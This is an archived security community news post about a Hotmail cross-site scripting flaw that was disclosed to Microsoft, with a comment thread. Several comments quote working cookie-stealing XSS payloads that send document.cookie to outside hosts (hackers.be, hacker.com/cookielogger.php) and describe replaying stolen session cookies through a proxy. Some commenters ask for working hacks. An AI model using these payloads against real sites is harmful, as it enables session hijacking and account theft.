View news
Hotmail security flaw |
|---|
|
Posted by eierkoek - Friday June 3 @ 13:37  Update2: Looks like Microsoft changed the page, this one doesn't work anymore. But on other places in the site the same bug is still present.Update: The tutorial is now online, read it on: www.net-force.nl/files/articles/hotmail_xss/. The exploit is still present. So go check it out, but don't abuse it! :) During a little game on the Net-Force IRC channel, I found out many big sites are still vulnerable to certain exploits. With the game somebody had to give a Google search term, and the first hit (not being MS, Google or Hotmail), would be searched for exploits. The first person who found an exploit won the round. Although I played this game somewhat by myself (pretty sad, I know), nice sites like sp.nl, nasa.gov, sitestat.com, time.com, cbs.nl, linux.org, cia.gov, and about 9 other sites where all found vulnerable (but not necessarily exploitable). The next day (June 1), I thought, "wth, I'll just try hotmail", in the believe Hotmail was almost unhackable. I had to search for about an hour and a half (unlike Nasa and CIA which only took me about 15 minutes), but with success. Together with Marijn I've tested my theory, and in no time I was reading the contents of his inbox. I've informed Microsoft of this security flaw, and I am writing a nice easy-to-understand tutorial: "How to hack hotmail" :) The tutorial I'm writing will consist of two parts. One very easy to understand tutorial that also includes stuff like "faking a cookie", and a more technical tutorial where I presume you have enough knowledge to understand what I'm talking about. This tutorial will be written to proof the existence of the exploit, to let other people learn how to handle security and to demonstrate the consequences of a security flaw. Currently I'm giving Hotmail some time to respond to my mail, while in the mean time I can finish my tutorial. I'm expecting a response of the hotmail crew with a text like "We have fixed the security hole, thank you very much, can we hire you?" ;). When I've waited long enough (or when they have fixed the security flaw) I will put the tutorial online. I will let you know if the security hole is still exploitable when the tutorial comes online. Please notice that hacking someone's e-mail inbox is against the law. I'm writing the tutorial as a "proof of concept". Do not hack somebody's inbox without his/her permission! Have fun at Net-Force and behave, Eierkoek |
» Comments
LOL congrats whith this victory:)
That is a nice hack!
well done Eierkoek!
You 2 rule!
micro$oft is pwned!
woehoew!
nice, nice!
even published sooner as anticipated, almost took me by suprise :)
me is wondering is 'people of net-force' is worth beer :D
Rhican
Nice man, but I though that hotmail had secured this flaw by locking IP adressses to sessions?
Keep up the good work!
Whahahahahaha.... Hotmail gets hacked by Net Force!!!
w00t Hotmail got pwned! By net-force.nl hehe, never thought I'd be member of such a community =)
I'm also surprised your a member of Net-Force :)
I'm sure microsoft will update the flaw.
I'm like 5min on the internet, and i allready found
your articles on a security site. Grtz, mb i should logon to irc and say hi.
Yes, bug was fixed. Pretty fast, for Microsoft :)
But as said in the Update notice, there is at least one other place on MSN.com where it's still there...
I've read your paper 'bout the hack and thought, let's test it. And yeah, the cookie is hard to get atm because of the fix. But I still can get it, but only the last step, working with proxomitron... it won't work!
I've tested it, and it still works (with an different XSS hole). So I think you are doing something wrong with proxomitrion. Have you adjusted your browser settings to use your own proxy server?
yup, I did that, even tried ff... hm strange, i'll try it again, maybe a simple restart will work, I've it all, but I want to see it working
where else on msn is it still working can anyone help
Nouto if it really doesn't work and can't figure out why start a topic in the general forum.
nice done,
it's even published on tweakers.net, you will become famous :-)
http://www.tweakers.net/nieuws/37593
GJ eierkoek!
Well done Eierkoek!
it has hit the news sites big time,
belgian newspapers, cnet, ...
to mutch to keep up.
Very nice...
Compliments.
Just heard you on the radio. Nice interview.
that's awesome *bows*
respect!
I was reading a article of this hack on www.standaard.be, a belgian newspaper. In 5 minutes I found a simmilar bug on the site of the standaard. I made a link and the person who clicks on it sends his password in plain text to my email.
That newspaper asks 120 euro's a year to get acces to the whole site... So they can't like it to much that someone has acces to everyones password.
It's quite funny that, one hour later, the article about 'how to hack hotmail' disappeared from there site :-)
If u like more info of the specific bug, u can mail me: benoitje AT gmail.com
Hehe, rather funny =D
Their site is still vulnerable I see (I found the hole myself too) . Saving usernames and passwords in their cookie, OMG, not even hotmail does that :P
indeed :-)
Can u mail me your hole? Let's see if it is the same.
@benoit: Check you PM inbox on net-force :)
When visiting the original location where it was posted (http://www.standaard.be/nieuws/economie/index.asp?articleID=DMF07062005_036&snel=1)
It says I have to be logged in to read the article
Oh, i tought they erased the article. When i login, i can still read it.
@eierkoek: It's the same bug that i found, with a little adjustment to make it possible to redirect the page. I've send my link to your pm.
just thought i'd jump in and mention that indeed and tell you all that i found it too.
not that hard if you know that it is there.. and your not wasting effort ;)
Meanwhile, I'll received a mail from 'de standaard' that there 'technical parter' was working on the bug. (the website is made by uniway.be)
30 minutes later it was fixed.
The methode i used was the same as the one eierkoek describes in his tutorial. The link to send the cookie to my site was:
http://www.standaard.be/Archief/Zoeken/index.asp?hidden1=0&result=1&Trefwoord2=%3Cscript%3Ed%3D%22%3E%3Cscript%3Edocument.location=%22http%3A%2F%2Fwww.hackers.be%3Fcookie%3D%22%2Bescape%28document.cookie%29%3C%2Fscript%3E
Please don't discuss other bugs in this news post.
i wonder if they will find the other ones too by themselves...
they don't pay us enough to find them all for them
Does this bug/exploit still work or have they fixed it yet?
I tried testing it myself and it does not work.
Even when I click on
http://ilovemessenger.msn.com/?mkt=nl-nl');alert(document.cookie);escape('
my cookie doesn't show lol
I guess they fixed it?
yes, that particular XSS hole was 'fixed'
as mentioned in "Update2" at the top of this page
or somewhere in the top of the tutorial.
Well fixed... they took the site offline, I don't know if it's back yet actually.
Yeah, that one is fixed. They put the ilovemessenger website back online yesterday.
If you only knew..
Happiness is not so much in having as sharing. We make a living by what we get, but we make a life by what we give..
Welwillend van je dat je deze wijsheid gedeeld hebt, maar ik had het op prijs gesteld als je dit voor jezelf had gehouden. Deze hack was reeds bekend bij een selectieve groep en werd enkel geëxplodeerd wanneer noodzakelijk. Het verwittigen van Micro$oft al voor het openbaar maken is een verstandige zet daar extensief misbruik niet uit te sluiten zou zijn geweest. Tóch ben ik er niet helemaal happy mee; ik had hier reeds een script voor geschreven welke veel handelingen weg nam, wat nu in de recycle bin kan.. Naja, no heart feelings, maar wel een beetje jammer.
Greetzz,
Steven
Dan weet je vast ook dat er meer XSS exploits zijn (nee ik geef ze niet) en je vast maar 1 regeltje in je script aan hoeft te passen.
oke, relaxed. Die bestaan nog steeds dus? Dan gaik ff zoeken.
Ok, i refrained myself from replying before, but there are a few things I want to say.
First of all in case you didn't notice this entire thread and in fact the entire site is in English. So it's would be much appreciated to continue the in the same language. I know all to well how irritating it is when foreign languages are mixed in with english.
And secondly: there is no such thing as "exploited when absolutely nescessary"
it's bogus and you know it, you are just annoyed because know you have one less 1337 trick you can show off with. basicly we don't care.
Also i don't think anybody was impressed by the fact that you wrote a script. Basicly the entire world went like argh another script kiddie. Suck it up.
as far as analogies go: you would be the guy that is all sad because somebody told the headmaster that there is a peephole into the girls lockerroom.
I have no respect for you, or your situation. I respect outsmarting the authority, beating the system, creative thinking, problem solving.
But like you said no hard feelings. And for pete's sake don't reply to this message. We both explained our views, and there is nothing to gain from ranting.
Yes I know "exploited when absolutely necessary" sounds a little crappy but I didn’t explain myself, and you don’t know for which cause.. but I’ve got the idea you don’t give a damn so I won’t bother you with that. Maybe you’re right, and I’m wining, but there’s still no need to express yourself in such an unkind manner. I’d really like analogies and have got a tasteful one in mind, but it’s better to leave it there..
@eierkoek:
If you really are as good as I think you are, you MUST know Microsoft endures a MUCH larger thread! After a long night (aint as fast as you) I just discovered something interesting.. In theory, if you exploit it right, you don’t even need to send a mail in order to hijack the session. For now only the usual way will work but I’m dámn close.. I can feel it!! ;-) If I succeed I will provide you with a proof of concept! Another black day in Microsoft’s history! :p
narrator: "a week passes by, nothing happened"
I noticed by playing around with my own hotmail cookie that using the cookie does work when faking the Headers but if the password is changed the original cookie fails. If the password is restored to what it was originally it still fails. I was using Proxomitron.
Ok i admitt that i probably didn't understand your post completely: partly due to the fact that your first sentence contains 9 verbs. So if you think i'm an ass after replying to this message that i missunderstood, That's fine with me.
but far be it for me to complain about language usage ;)
a cookie is in fact a http header, so when faking headers you must also fake the cookie, because if it isn't sent to the server, the server won't know it's contents. Since is common practice not to allow webservers to read your /cookies.
It is very possible that changing your password back and forward creates a different session, and thus render the 'stolen' cookie useless. However in relation to this exploit method it isn't really important imho, most people don't even know how to change it anyways, and the rest is just lazy.
no pun intended, well not mutch anyways. ;-)
Ok, fair enough about the miunderstanding. Let me clarify.
Firstly, I signed in to my hotmail account.
I then did a javascript: alert in the address field and obtained my cookie.
I signed out of my hotmail account.
Then, I started Proxomitron and loaded the cookie into proxomitron as suggested and set my browser to the port of Proxomitron proxy server as needed.
I launched a new browser and typed in http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes into the address field. I was taken to my inbox.
This worked repeatedly.
I then shut down the Proxomitron and restored my browser to the normal settings. I logged into my hotmail account normally typing in a password and I changed the account password and signed out and closed the browser.
Now, going back to the Proxomitron, using the same cookie as before, it fails and take me to a log-in page asking for a password.
Tha's pretty much it.
Ok, here's the thing:
what you do with these types of exploit is
session hijacking
someone logs in, and from that point you use that "session" of that user
when you are going to login and logout and change passwords it's pretty mutch certain that a new session will be started...
Makes sense. From what I read it is claimed that once you have the cookie you have access no matter what. This may be true but may require more knowledge of the cookie itself so portions oif it could be edited or removed, I don't know.
I doub't Eierkoek wrote anywhere 'no matter what', but again i could be wrong.
If you read it on other sites, it is just to simplify and scare people, since scaring is money in this society.
Anyway, rest assured there is no 'nomatterwhat' in this field of work. You steal a session, as long as the session exists you can access the account with it. just study sessions to understand how it works.
well done!
How did u find the exploit?
u must b gud
Well, i have got every thing, and thankx for every thing but i havent understood on paragraph which is (Cookielogger.php is now ready to log text strings, so it's also ready to log cookies. I use the Cross Site Scripting exploit to inject a code that will redirect the user to http://www.hacker.com/cookielogger.php with the argument "cookie" filled with the user's cookie. So when the user visits the msn site with added code, he will be redirected to http://www.hacker.com/cookielogger.php?cookie=hiscookie and the hacker can read his cookie information at the site http://www.hacker.com/logfile.txt because "hiscookie" is now logged to a textfile the hacker can see. the code I'm inserting in msn.com will look like this:
<SCRIPT>location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>)
So can u please explain this to me!
Kind Regards
abdullahoriakhill308@hotmail.com
Hello,
Hacking HOTMAIL ACCOUNT DOES NOT WORK ANYMORE :( HELP!!
Personally, I'm just wondering if the "2nd" bug you guys found is still somewhere in MSN ?
It'd be a great training to find it myself :)
» Add a comment
Login if you want to comment on this item.